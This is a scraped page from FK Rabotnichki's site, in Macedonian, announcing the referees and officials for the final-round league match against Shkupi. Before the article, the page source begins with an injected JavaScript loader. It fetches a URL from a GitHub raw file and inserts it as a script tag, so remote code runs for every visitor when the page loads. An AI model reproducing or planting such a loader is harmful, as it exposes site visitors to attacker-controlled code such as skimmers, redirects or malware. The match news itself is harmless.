;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Марјан Гоцевски ќе го суди мечот Работнички – Шкупи
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Марјан Гоцевски ќе го суди мечот Работнички – Шкупи

Работнички в недела, со почеток во 16.30 часот, ќе го пречека Шкупи на „Тодор Проески арена“, во последното 36.коло од Првата фудбалска лига. Овој меч ќе биде исклучително значаен со оглед дека ќе одлучува и за задржување на четвртата позиција, која ќе води во квалификациите од Лигата на Европа.

Одредени се официјалните лица за овој натпревар. Главен судија ќе биде Марјан Гоцевски (Струмица), а ќе му помагаат Ѓорѓи Станковски и Кире Ангеловски. Четврти судија ќе биде Даниел Василевски (Скопје), а дополнителни судии зад головите се Константин Влахо и Марјан Младеновски.

За делегат на натпреварот е одреден Антонио Насевски (Кратово), а контролор на судењето ќе биде Делчо Јакимовски (Скопје).